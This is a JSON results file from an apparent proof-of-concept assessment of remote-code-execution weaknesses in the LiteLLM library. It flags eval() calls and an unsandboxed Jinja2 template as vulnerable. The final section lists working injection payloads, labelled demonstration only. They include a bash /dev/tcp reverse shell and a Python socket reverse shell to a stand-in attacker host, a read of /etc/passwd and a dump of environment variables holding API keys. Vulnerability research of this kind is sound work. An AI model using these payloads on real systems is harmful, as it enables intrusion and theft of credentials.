nanobot/poc/litellm_rce_results.json

[
  {
    "name": "template_injection",
    "description": "Template string injection leading to eval()",
    "vulnerable": true,
    "details": "Found eval() in litellm/utils.py",
    "error": null
  },
  {
    "name": "callback_rce",
    "description": "Custom callback handler code execution",
    "vulnerable": false,
    "details": "Found custom logger callback handler (check version)",
    "error": null
  },
  {
    "name": "proxy_config_injection",
    "description": "Proxy server configuration injection",
    "vulnerable": true,
    "details": "Found eval() in proxy files: ui_sso.py, pass_through_endpoints.py",
    "error": null
  },
  {
    "name": "response_parsing_rce",
    "description": "Unsafe model response parsing",
    "vulnerable": false,
    "details": null,
    "error": null
  },
  {
    "name": "ssti_vulnerability",
    "description": "Server-Side Template Injection (SSTI) - CVE in < 1.34.42",
    "vulnerable": true,
    "details": "Unsandboxed Jinja2 template in arize_phoenix_prompt_manager.py",
    "error": null
  },
  {
    "name": "payload_demonstration",
    "description": "Example RCE payload patterns (demonstration only)",
    "payloads": [
      {
        "name": "OS Command Execution",
        "payload": "__import__('os').system('id')",
        "description": "Execute system command via os.system"
      },
      {
        "name": "Reverse Shell",
        "payload": "__import__('os').system('bash -c \"bash -i >& /dev/tcp/ATTACKER/4444 0>&1\"')",
        "description": "Spawn reverse shell to attacker"
      },
      {
        "name": "File Read",
        "payload": "__import__('builtins').open('/etc/passwd').read()",
        "description": "Read arbitrary files"
      },
      {
        "name": "Environment Exfiltration",
        "payload": "str(__import__('os').environ)",
        "description": "Extract environment variables (API keys, secrets)"
      },
      {
        "name": "Python Code Execution",
        "payload": "exec('import socket,subprocess;s=socket.socket();s.connect((\"attacker\",4444));subprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())')",
        "description": "Execute arbitrary Python code"
      }
    ]
  }
]